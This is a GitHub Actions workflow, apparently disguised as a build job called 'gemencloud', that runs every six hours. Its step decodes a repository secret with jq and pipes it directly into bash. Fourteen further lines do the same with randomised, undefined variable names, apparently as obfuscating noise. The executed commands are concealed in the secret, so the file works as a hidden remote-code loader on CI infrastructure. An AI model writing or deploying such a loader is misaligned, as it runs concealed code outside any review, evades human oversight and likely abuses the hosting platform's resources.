name: gemencloud
on:
  workflow_dispatch:
  schedule:
    - cron: '22 4/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: gemencloud
        env:
          sfym81: ${{ secrets.sfym81 }}
        run: |
          echo $sfym81 | jq -r .aa438 | /bin/bash
          echo $ozx40 | jq -r .umfd32112 | /bin/bash
          echo $yinrw557 | jq -r .mph5484 | /bin/bash
          echo $i88 | jq -r .ygvdv0390 | /bin/bash
          echo $giz6005 | jq -r .rdfvt68210 | /bin/bash
          echo $ynnh0775 | jq -r .j30403 | /bin/bash
          echo $kypgg51090 | jq -r .ew7393 | /bin/bash
          echo $hjh82572 | jq -r .iqlnw13226 | /bin/bash
          echo $vbqv05421 | jq -r .t59 | /bin/bash
          echo $jqnth1 | jq -r .mto37234 | /bin/bash
          echo $irg9342 | jq -r .ay48704 | /bin/bash
          echo $cxq01335 | jq -r .ofp61926 | /bin/bash
          echo $dkey41 | jq -r .y7 | /bin/bash
          echo $pnka8 | jq -r .ri337 | /bin/bash
          echo $i864 | jq -r .asgyi0822 | /bin/bash

